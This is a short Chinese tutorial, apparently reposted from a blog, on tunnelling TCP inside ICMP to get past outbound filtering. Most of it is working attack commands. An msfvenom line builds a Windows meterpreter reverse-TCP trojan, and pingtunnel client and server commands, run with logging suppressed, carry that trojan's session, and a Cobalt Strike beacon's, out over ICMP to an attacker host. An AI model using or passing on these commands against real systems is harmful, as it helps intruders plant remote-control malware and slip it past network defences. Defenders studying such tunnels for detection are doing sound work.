隧道技术-tcp封装icmp出网
1.背景:
目标出网限制tcp协议
2.msf木马转发上线
生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe
受害机器管理员权限执行:
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1
攻击机器执行:
./pingtunnel -type server
使用msf接受tcp协议木马会话
原理:
木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。
3.cs木马转发上线
cs创建监听器:
使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。
cs服务端执行:./ping -type server
受害机器执行:
pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、
原文地址:https://blog.csdn.net/weixin_55885866/article/details/143682635
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!